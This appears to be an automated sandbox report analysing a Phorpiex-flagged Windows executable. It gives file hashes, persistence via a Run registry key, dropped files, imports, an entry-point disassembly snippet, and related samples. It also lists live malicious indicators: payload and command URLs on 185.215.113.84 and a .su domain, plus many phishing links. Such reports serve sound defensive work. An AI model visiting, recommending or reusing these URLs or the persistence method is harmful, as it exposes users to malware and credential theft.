                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, redir.update.msft.com.trafficmanager.net, login.live.com, store-images.s-microsoft.com, www.update.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                TimeTypeDescription
                                18:31:06API Interceptor1x Sleep call for process: Id4zlrsrZ4.exe modified
                                18:31:09API Interceptor14x Sleep call for process: winrecsv.exe modified
                                18:31:12AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\winrecsv.exe
                                18:31:36API Interceptor2x Sleep call for process: 509517324.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                185.215.113.66c0887fac0c1921b6678e81a90619bda7f0ffb9abee995.exeGet hashmaliciousBrowse
                                  ehtBPDX9ZZ.exeGet hashmaliciousBrowse
                                    ehtBPDX9ZZ.exeGet hashmaliciousBrowse
                                      239.255.255.250https://madalonlaw.squarespace.com/Get hashmaliciousBrowse
                                        https://www.envasesyetiquetas.com/lo/#amy@steinborn.comGet hashmaliciousBrowse
                                          https://s.id/Microsoftoffice365Get hashmaliciousBrowse
                                            https://microsoftonlineonedrivesecurefileshare.nifty.pm/l/Ma1AbajjA_?pubGet hashmaliciousBrowse
                                              Secured -Growing Generations_New Update 08152022 (6.45 KB).msgGet hashmaliciousBrowse
                                                https://drive.google.com/file/d/1I-Nfl0LFCmZ_wLRV7_GRnb_5GYf71dci/view?usp=drivesdkGet hashmaliciousBrowse
                                                  http://www.Penguinrandomhouse49298900.cnxjeans.com/Penguinrandomhouse49298900/aHR0cHM6Ly9zbWFydGlkZWFzLmxrL3NlY3VyZS9QZW5ndWlucmFuZG9taG91c2UvNDkyL2R2YXVnaGFuQHBlbmd1aW5yYW5kb21ob3VzZS5jby51awGet hashmaliciousBrowse
                                                    https://czaplicka.eu/netza.phpGet hashmaliciousBrowse
                                                      https://secureonlineportal.jvmreatly.org/Get hashmaliciousBrowse
                                                        http://staureez.netGet hashmaliciousBrowse
                                                          https://click.smartsheet.com/f/a/KdxLR8miSTFJ7VN-h9XLmg~~/AARF7wA~/RgRk3LyVP0UIZG93bmxvYWREV2h0dHBzOi8vYXBwLnNtYXJ0c2hlZXQuY29tL2IvZG93bmxvYWQvYXR0LzEvODIwMjY4MjgwMTM4MzMwMC9jZmRmaWg3Y2U3cmoycXZwc3ZwZXV6eHNoblcDc3BjQgpi65U3-mL7BCz-UhlqYW5uYS5zdXR0ZXJAcmVhbHBhZ2UuY29tWAQAAAAAGet hashmaliciousBrowse
                                                            https://pxlme.me/BENDELIGet hashmaliciousBrowse
                                                              https://www.dropbox.com/scl/fi/wg2u64p9gg53bcda16gzd/You-have-been-invited-you-to-view-the-folder-%E2%80%9CPO48993_49110%22.paper?dl=0&rlkey=rls1740uy7srqs62ao8k12uspGet hashmaliciousBrowse
                                                                https://gifttous.com/.well-known/dk/Get hashmaliciousBrowse
                                                                  PO 20008098.exeGet hashmaliciousBrowse
                                                                    https://github.com/DaxStudio/DaxStudio/releases/download/v2.17.3/DaxStudio_2_17_3_setup.exeGet hashmaliciousBrowse
                                                                      http://mgamt.com/landing/96908b5f-2855-4989-80e7-1441a5f35cc1Get hashmaliciousBrowse
                                                                        https://img.topGet hashmaliciousBrowse
                                                                          Shipping_Doc.htmlGet hashmaliciousBrowse
                                                                            Payment Schedule-PL-PG-1693507.file.htmlGet hashmaliciousBrowse
                                                                              185.215.113.84GitmEGG60Q.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/twizt/6
                                                                              o3N9Cy4cvC.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/twizt/6
                                                                              ZQ3TjoF5rO.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/twizt/3
                                                                              Iz6iyG7Wps.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/twizt/1
                                                                              V0T2Q9C6iN.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/twizt/5
                                                                              3TW9WSTDsD.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/twizt/6
                                                                              6ahTdtSd17.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/twizt/4
                                                                              c1ly4Kd6oh.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/twizt/6
                                                                              Ycmt4NSlWu.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/twizt/3
                                                                              va7IV3k6le.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/twizt/3
                                                                              fl1V8eYAl3.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/twizt/6
                                                                              149271394137871.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/twizt/2
                                                                              winsvc.exeGet hashmaliciousBrowse
                                                                              • ashihsijaediaehf.su/t.php?new=1
                                                                              p.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/m/l.exe
                                                                              qpzcpgVWw8.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/etc.exe
                                                                              1jqUUC0fBX.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/ec.exe
                                                                              ehtBPDX9ZZ.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/pei.exe
                                                                              ehtBPDX9ZZ.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84/pei.exe
                                                                              No context
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              WHOLESALECONNECTIONSNLGenshin Hack.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.23
                                                                              DnlZ9gKew7.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.216
                                                                              BykntgM55B.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.216
                                                                              veBv0JBRUl.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.216
                                                                              FCAYglGyHi.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.83
                                                                              Installer.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.23
                                                                              GitmEGG60Q.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.84
                                                                              Ye8DVmUSpD.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.83
                                                                              SPp5wgKlxt.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.23
                                                                              s4LjhG8EKm.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.216
                                                                              v202fCnto7.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.216
                                                                              f0Q0bm1XT5.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.216
                                                                              ecQNq4SIuc.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.216
                                                                              X2NycPwHDC.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.216
                                                                              XRF6tB7kQj.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.216
                                                                              sutup.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.23
                                                                              mXhtXR9ekC.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.16
                                                                              CbmhYKLsrt.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.94
                                                                              523STXjYJX.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.204
                                                                              7nPvFVRupT.exeGet hashmaliciousBrowse
                                                                              • 185.215.113.23
                                                                              ALGTEL-ASDZskid.x86_64-20220815-1256Get hashmaliciousBrowse
                                                                              • 105.102.198.221
                                                                              8vEeXLnxIMGet hashmaliciousBrowse
                                                                              • 41.100.56.195
                                                                              8PyEiVVitWGet hashmaliciousBrowse
                                                                              • 154.255.38.84
                                                                              aaVI0wtCZ6Get hashmaliciousBrowse
                                                                              • 41.108.48.174
                                                                              R4WLr8yqVFGet hashmaliciousBrowse
                                                                              • 105.97.152.179
                                                                              PFKOKqZ9D6.exeGet hashmaliciousBrowse
                                                                              • 41.108.184.148
                                                                              32lKEOZgq0Get hashmaliciousBrowse
                                                                              • 197.207.57.239
                                                                              skid.arm7Get hashmaliciousBrowse
                                                                              • 105.111.67.115
                                                                              ZkN2nmte8yGet hashmaliciousBrowse
                                                                              • 197.205.198.198
                                                                              nkdraDOE0pGet hashmaliciousBrowse
                                                                              • 197.117.249.159
                                                                              ncJmBOetwDGet hashmaliciousBrowse
                                                                              • 41.106.43.166
                                                                              YVRpq3zOXHGet hashmaliciousBrowse
                                                                              • 41.104.241.218
                                                                              lAd5Gs8bL8Get hashmaliciousBrowse
                                                                              • 197.118.32.240
                                                                              0qdjzL1bxvGet hashmaliciousBrowse
                                                                              • 41.110.216.143
                                                                              of4NFNJ322Get hashmaliciousBrowse
                                                                              • 41.105.231.149
                                                                              qMGe0LAdNlGet hashmaliciousBrowse
                                                                              • 41.110.164.254
                                                                              363k6KwW9fGet hashmaliciousBrowse
                                                                              • 41.102.102.226
                                                                              Mc7aTFVmmvGet hashmaliciousBrowse
                                                                              • 41.97.193.187
                                                                              q0lC7ihSlhGet hashmaliciousBrowse
                                                                              • 41.108.245.1
                                                                              Dze3X1EzuDGet hashmaliciousBrowse
                                                                              • 154.255.38.35
                                                                              No context
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              C:\Users\user\AppData\Local\Temp\509517324.exeGitmEGG60Q.exeGet hashmaliciousBrowse
                                                                                Process:C:\Windows\winrecsv.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):6912
                                                                                Entropy (8bit):7.973025390406073
                                                                                Encrypted:false
                                                                                SSDEEP:96:oj6V/SoG95rGUWjQXk2i4yZwil2aFrl28WqR/P7/8lOmAzhBHqsUNDjUmD2eEN8x:oeVhGLr0QXj1yZHl9RZz8lwt8fNXr
                                                                                MD5:9E2F163C15EE457BE1F51981985570A1
                                                                                SHA1:4A191E6DA4A85B915F285E758D0789D2EDE3AFF1
                                                                                SHA-256:C7DE55DDD548F4F268979E1F0C70AB0EDB2566C0CE46B921EA281E1570ABAD82
                                                                                SHA-512:4B3EAE4A1DF79AC8805F46D32DAECDB54028D160A5056679D4478C08E7F8FF42DF5F84F4B1FE2CB8B5F3574EAE5B18A94AD865EDFC4D314A51118316C907967D
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:.H...Vv..8......a.=.d...U..rcn{..,..m.K....E..re...l.T....f.W#...R.p@3...b8.o.....mF.<..{.g./d.[0./....-.w..6...5dt....'..S cP.LP......Y..>cq }. .=l.hm.WQ,.OD.).k.rI...%T&a`#p.7.L...p.c5....On..K...vg..&{.xtj.......;+.......{]+...]1....P.E.......2.N....G.....Z>ZX.}3]..l.r...X....4>.ud&.".JR..o'..#|\..7.G.Q$.j.(I....>,x1x.qIL.6.....Q....D...R..Jp..5.6.e#O.....FS.uCf..Jc..T.0.4...N.}...O.,..Q..2..&`..P...r.3.!....s.N<rHb..L0[H......&.=3?B.Ro..k...u?...l.<y.5"....u.>)8-......^..c.OF...S.SYD.S}............p.[....M.".l../.".....x..I.Jj"....,R)..qJ..smP.T.%I.nw)5..'.....|.q.I.w.Uz?...q...UY..C..3.Z.rk..x....F..G...!..u..E.....R..A.s..`*r0.+.5......x.......-..o.k..:y.r..%7L......>w)C......1NuPZ...WN>I....R....r.;...A...9.d./tx...{..A.R.%..y....^.4^x..........q...........$/..={...........3....6/..`.{.......Qc..(\....,..~b.-S.. a..@..".g;(..#..c........P..?.....|e..T. ...n}yG]_.:.g..{.&.pg..e..0..{.Y.P.8..e3.....!..hX..q.LL....jQ^.7.E...?C...,
                                                                                Process:C:\Users\user\AppData\Local\Temp\509517324.exe
                                                                                File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):564
                                                                                Entropy (8bit):4.775290370533887
                                                                                Encrypted:false
                                                                                SSDEEP:12:TjeRHVIdtklI5rRCNGlTF5TF5TF5TF5TF5TFK:neRH688lTPTPTPTPTPTc
                                                                                MD5:5DA4C1420F84EC727D1B6BDD0D46E62E
                                                                                SHA1:280D08D142F7386283F420444EC48E1CDBFD61BB
                                                                                SHA-256:3C8CC37A98346BD0123B35E5CCD87BD07D69914DAE04F8B49F61C150D96E9D1F
                                                                                SHA-512:7C51A628831D0236E8D314C71732B8A62E06334431D10F7C293C49B23665B2A6A1DDBC4772009010955B5228EA4A5CD97FB93581CE391EE1792E8A198B76111A
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                Process:C:\Windows\winrecsv.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):6656
                                                                                Entropy (8bit):4.230127984822324
                                                                                Encrypted:false
                                                                                SSDEEP:96:nYdJtz6aW+HMl7hswYGZ9w/Ptboynun9Cth:nktz/67hO/P1oynW8
                                                                                MD5:A475E43527D7DC7D6F2D23BAD64FCC99
                                                                                SHA1:793A7625C0106D6CD79D060B4EEC94E58530833E
                                                                                SHA-256:F97C43BF3DCE6180E658F2C3776E31CF52472B28AC8249BE4D307880B6405EEB
                                                                                SHA-512:4AF57A218D7D790B5EC4581DD2BC941DEFF05EA11BF6054A9D268C054AF421977CDD68D5090884358208925F50023C97E9CFABA0831D72E9BCDCCA729447D900
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: Metadefender, Detection: 52%, Browse
                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                Joe Sandbox View:
                                                                                • Filename: GitmEGG60Q.exe, Detection: malicious, Browse
                                                                                Reputation:low
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........j.wTj.wTj.wT..sTh.wT.yTk.wT..}Ta.wTMM.Tg.wTj.vTN.wTt..Tk.wTt..Tk.wTRichj.wT........PE..L......b............................|........ ....@..........................`............@..................................#.......@.......................P....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...<....0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\winrecsv.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):4096
                                                                                Entropy (8bit):4.818471917182262
                                                                                Encrypted:false
                                                                                SSDEEP:96:IlukshBzu5Gen5eRl7KKCek/Wok71L6LoDez8seyZ61ocHPL:I8jhBzHe0VKSUkRGsDmeyGoGL
                                                                                MD5:FBC49CE2908C1B0B1532569F35D123FF
                                                                                SHA1:BB0948AD3CE4472B6A9A03F4FB5F1A04216C9AE9
                                                                                SHA-256:D3F2C2406407678E4CF9507F48143A6B39261F11835ACD32585FC9D789A4EB7C
                                                                                SHA-512:F46D81481B015DAA94A52826CACDCEE00B4A98D7A938B36F1F3F2372C00B08003AB2FB859DEEC3DA82B3E8A9FC65632A469CCF67FFA5AF999564E68F67F00212
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:.$.[......Y.......M%......................Y....W..G....W................k.....o^5.....[bu*......U.....-............Y..}....Y........x.e.......m....^.E........:....).PZ.....pjp.....XL.....^..V.....#.R....Y.......\.....^.......>........l\............................9..............\/z.....EC.z...........$\.C.....^................m.............m..........`...._8Y.......o.....N&kY.....G........W.....X.J....M".{......9.......S.....\} x......a.....W..@....>.......u......ic.....\/#....._.......).`.....m..z....N&.)....p.nJ....Y.................}.....................8........;.............q5M............f........#......mJC`.......1......U%....-..D...........]u$o.......<.....q.F............R..|...._.O.....W..i...._......%.........Z.....WL3........H....[..............K}.....N.T@....PP.Y......y............'3.b....Y................6F.....#D.......G.......&....P........5.).....;.q............]..(.............x....._:W.......[\......Z............X.......W..........I......nP....
                                                                                Process:C:\Users\user\AppData\Local\Temp\509517324.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):1572864
                                                                                Entropy (8bit):4.273557257647912
                                                                                Encrypted:false
                                                                                SSDEEP:12288:bwb+0Th31Trp3TSP6a0rOupypy+Z6U6KvUJn5CmGreLzGGUsyU:ka0Th31Trp3TSP6ff+C
                                                                                MD5:8DBEF248F4B8327279613A374208D979
                                                                                SHA1:CD8BF0CF7FF05E0DA686EF2F11C0CC5ECEA94634
                                                                                SHA-256:AF29DD441C0D4156DF24A534E10A381F7465CB8D2E4DB00F79B4848FE2203028
                                                                                SHA-512:285BE7CAF852291F67503C03329447A42B704F32E56EE64CD2FBF9E6889EBDD38E8411F239820413BB0E1C8FBBCD6E02C5AD3E880737544E329CF635C57507EC
                                                                                Malicious:false
                                                                                Preview:regfW...W...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.[..................................................................................................................................................................................................................................................................................................................................................Ii..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\509517324.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):12288
                                                                                Entropy (8bit):3.3091281554845113
                                                                                Encrypted:false
                                                                                SSDEEP:192:lRTHAZo19YOx3x1YN5FSE0V1w5G5tGrgM3+4:rT255e+G5tGrN+4
                                                                                MD5:086FD986F38603874BB00AB8F63F8DBD
                                                                                SHA1:F8BA4481F857FA46502D788A417F5B135DF4B5FE
                                                                                SHA-256:0E7FD6EB2B50E9E7D0C9A9D4AC960F3EB32D070B80CED28CD0C24E7837FE336E
                                                                                SHA-512:71788E2D873A89BDFFE01F312701FD787BBFCC81DA5591A7B15BE3B58C86FD450CF74D96763FE431F9A7F2D24EF64379E220C0B5F85AAD89DF61B0A04F750F13
                                                                                Malicious:false
                                                                                Preview:regfV...V...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.[..................................................................................................................................................................................................................................................................................................................................................Oi..HvLE........V...........H]...j.Vh.&>.x...........P......hbin................p.\..,..........nk,..!...,......0........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..}..a...... ...........8~.............. .......Z.......................Root........lf......Root....nk .k..|;.................................. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p.......nk .
                                                                                Process:C:\Users\user\Desktop\Id4zlrsrZ4.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):77312
                                                                                Entropy (8bit):6.345505183378638
                                                                                Encrypted:false
                                                                                SSDEEP:1536:K3Mz8enofIxQrFP+ZrFugrZpVnWw7V15Frrmi:xweZQhGZ5ugDVnj7V15Fr
                                                                                MD5:ED2D7B25BB360CCCB4F0F6A4F8732D7A
                                                                                SHA1:6FFCC083956C5AC19826BDD87E12F87817EE837C
                                                                                SHA-256:22F524ABC98F958705FEBD3761BEDC85EC1AE859316A653B67C0C01327533092
                                                                                SHA-512:6592EC1A12F9575176474C6192D49F4F4A87998DA6692E07E8BA6A93789D6A92E41DBABD3488A27A49EC8C8C414E02751867FEB2A0038E4091630CA3E4FB235F
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\winrecsv.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...J...K.......K.......K...D...K..&&...K...J.~.K..&0...K.....K.....K.Rich..K.........PE..L...0D.b.....................X...... Z............@..........................`.......................................................................................................................................................................text............................... ..`.rdata...........0..................@..@.data....&...0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):6.345505183378638
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:Id4zlrsrZ4.exe
                                                                                File size:77312
                                                                                MD5:ed2d7b25bb360cccb4f0f6a4f8732d7a
                                                                                SHA1:6ffcc083956c5ac19826bdd87e12f87817ee837c
                                                                                SHA256:22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092
                                                                                SHA512:6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f
                                                                                SSDEEP:1536:K3Mz8enofIxQrFP+ZrFugrZpVnWw7V15Frrmi:xweZQhGZ5ugDVnj7V15Fr
                                                                                TLSH:CB732810F6D0C03AF0F740FBE2FB05AA592CEFB4530698E752D9A85F5B215D1A9364A3
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...J...K.......K.......K...D...K..&&...K...J.~.K..&0...K.......K.......K.Rich..K.........PE..L...0D.b...........
                                                                                Icon Hash:00828e8e8686b000
                                                                                Entrypoint:0x405a20
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x62FA4430 [Mon Aug 15 13:03:44 2022 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:0
                                                                                File Version Major:5
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:2f2316fb946682a102e453a8ae405904
                                                                                Instruction
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 00000C4Ch
                                                                                push 00001B58h
                                                                                call dword ptr [004100F0h]
                                                                                mov dword ptr [ebp-00000214h], 00000000h
                                                                                mov dword ptr [ebp-0000083Ch], 00002332h
                                                                                mov eax, dword ptr [ebp-00000214h]
                                                                                cmp eax, dword ptr [ebp-0000083Ch]
                                                                                jnc 00007FF3C0B6163Bh
                                                                                push 00000000h
                                                                                push 00413C60h
                                                                                call dword ptr [004101C0h]
                                                                                mov dword ptr [ebp-00000A50h], eax
                                                                                cmp dword ptr [ebp-00000A50h], 00000000h
                                                                                je 00007FF3C0B61607h
                                                                                push 000003E8h
                                                                                call dword ptr [004100F0h]
                                                                                push 00413C60h
                                                                                push 00413C8Ch
                                                                                call dword ptr [00410098h]
                                                                                push 00413C60h
                                                                                push 00413C8Ch
                                                                                call dword ptr [00410098h]
                                                                                push 00000000h
                                                                                push 00413C60h
                                                                                call dword ptr [004101C0h]
                                                                                mov dword ptr [ebp-00000A74h], eax
                                                                                cmp dword ptr [ebp-00000A74h], 00000000h
                                                                                je 00007FF3C0B60ECDh
                                                                                push 000003E8h
                                                                                call dword ptr [004100F0h]
                                                                                push 00413C60h
                                                                                push 00413C8Ch
                                                                                call dword ptr [00410098h]
                                                                                push 000003E8h
                                                                                call dword ptr [004100F0h]
                                                                                Programming Language:
                                                                                • [ C ] VS2005 build 50727
                                                                                • [IMP] VS2005 build 50727
                                                                                • [LNK] VS2008 build 21022
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x11f1c0x104.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x100000x318.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000xe4fc0xe600False0.4665591032608696data6.11073833830779IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x100000x2eca0x3000False0.4490559895833333data5.5519954819651245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0x130000x26e00x1400False0.6556640625data6.173018070745021IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                DLLImport
                                                                                WS2_32.dllrecvfrom, setsockopt, sendto, bind, WSAStartup, ioctlsocket, recv, send, WSACloseEvent, WSARecv, WSASend, WSAGetLastError, WSAEnumNetworkEvents, gethostname, connect, inet_ntoa, inet_addr, htons, getsockname, shutdown, socket, closesocket, gethostbyname, WSAEventSelect, WSAGetOverlappedResult, WSAWaitForMultipleEvents, getpeername, accept, WSACreateEvent, WSASocketA, listen
                                                                                SHLWAPI.dllPathFileExistsW, StrCmpNW, PathMatchSpecW, PathFindFileNameW, PathFileExistsA, StrChrA, StrStrIA, StrCmpNIA, StrStrW
                                                                                urlmon.dllURLDownloadToFileW
                                                                                WININET.dllInternetConnectA, InternetOpenUrlW, HttpQueryInfoA, InternetOpenW, HttpSendRequestA, HttpAddRequestHeadersA, HttpOpenRequestA, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle, InternetCrackUrlA
                                                                                ntdll.dllmemcpy, _chkstk, _aulldiv, RtlUnwind, memmove, mbstowcs, RtlTimeToSecondsSince1980, NtQuerySystemTime, NtQueryVirtualMemory, strstr, isdigit, isalpha, _allshl, _aullshr, memset
                                                                                msvcrt.dllrand, srand, _vscprintf
                                                                                KERNEL32.dllMoveFileW, CreateProcessW, GetLocaleInfoA, DuplicateHandle, DeleteCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentThread, GetCurrentProcess, InterlockedExchangeAdd, InterlockedIncrement, InterlockedExchange, WaitForSingleObject, InterlockedDecrement, GetCurrentProcessId, HeapSetInformation, GetProcessHeaps, GetSystemInfo, PostQueuedCompletionStatus, HeapValidate, HeapCreate, HeapFree, HeapAlloc, HeapReAlloc, ExpandEnvironmentStringsW, CreateThread, DeleteFileA, CreateMutexA, MoveFileA, GetLastError, CreateEventA, ExitProcess, GetQueuedCompletionStatus, CreateIoCompletionPort, SetEvent, GetVolumeInformationW, SetFileAttributesW, lstrcpyW, DeleteFileW, GetDiskFreeSpaceExW, FindNextFileW, lstrcmpiW, QueryDosDeviceW, RemoveDirectoryW, FindClose, lstrlenA, GlobalLock, GetModuleHandleW, GetTickCount, GlobalAlloc, Sleep, lstrcpynW, ExitThread, MultiByteToWideChar, lstrlenW, GlobalUnlock, GetFileSize, MapViewOfFile, UnmapViewOfFile, WriteFile, InitializeCriticalSection, LeaveCriticalSection, CreateFileW, FlushFileBuffers, EnterCriticalSection, CreateFileMappingW, CloseHandle, FindFirstFileW, GetDriveTypeW, MoveFileExW, CreateDirectoryW, GetLogicalDrives, CopyFileW, GetModuleFileNameW, lstrcmpW
                                                                                USER32.dllSendMessageA, wsprintfW, IsClipboardFormatAvailable, RegisterClassExW, GetWindowLongW, GetClipboardData, EmptyClipboard, ChangeClipboardChain, SetWindowLongW, CloseClipboard, GetMessageA, FindWindowA, ShowWindow, wsprintfA, SetForegroundWindow, wvsprintfA, TranslateMessage, DefWindowProcA, RegisterRawInputDevices, CreateWindowExW, DispatchMessageA, OpenClipboard, SetClipboardData, SetClipboardViewer
                                                                                ADVAPI32.dllRegSetValueExW, CryptGenRandom, CryptReleaseContext, CryptAcquireContextW, RegQueryValueExW, RegOpenKeyExA, RegSetValueExA, RegCloseKey, RegOpenKeyExW
                                                                                SHELL32.dllShellExecuteW
                                                                                ole32.dllCoInitializeEx, CoCreateInstance, CoInitialize, CoUninitialize
                                                                                OLEAUT32.dllSysFreeString, SysAllocString
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Aug 15, 2022 18:31:30.772701025 CEST4976280192.168.2.7185.215.113.66
